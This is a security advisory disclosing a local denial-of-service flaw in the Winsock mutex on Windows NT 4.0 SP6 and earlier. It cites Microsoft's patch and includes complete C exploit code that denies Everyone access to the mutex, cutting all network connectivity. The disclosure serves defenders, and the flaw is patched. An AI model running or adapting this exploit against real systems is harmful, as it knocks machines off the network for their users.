ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below

[Arne Vidstrom <arne.vidstrom () NTSECURITY NU>]

-- Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below --

Author:

Arne Vidstrom (arne.vidstrom () ntsecurity nu) - http://ntsecurity.nu


Severity:

Denial Of Service if the attacker is able to execute the exploit code under
any account on the system. Remote exploitation is not possible.


Details:

There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to
which the Everyone group has Full Control. Any user can change this to No
Access, and that disables all network connectivity through Winsock until the
system is rebooted.


Vendor Response:

Microsoft has released a patch and you can read more about it in their
Security Bulletin at
http://www.microsoft.com/technet/security/bulletin/ms01-003.asp.


Sample exploit code:

/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom () ntsecurity nu
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>

int main(void)
{
        PSID pEveryoneSID;
        SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
        PACL pDacl;
        DWORD sizeNeeded;

        AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0,
0, 0, 0, &pEveryoneSID);
        sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
GetLengthSid(pEveryoneSID) - sizeof(DWORD);
        pDacl = (PACL) malloc(sizeNeeded);
        InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
        AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
        SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
        free(pDacl);
        return 0;
}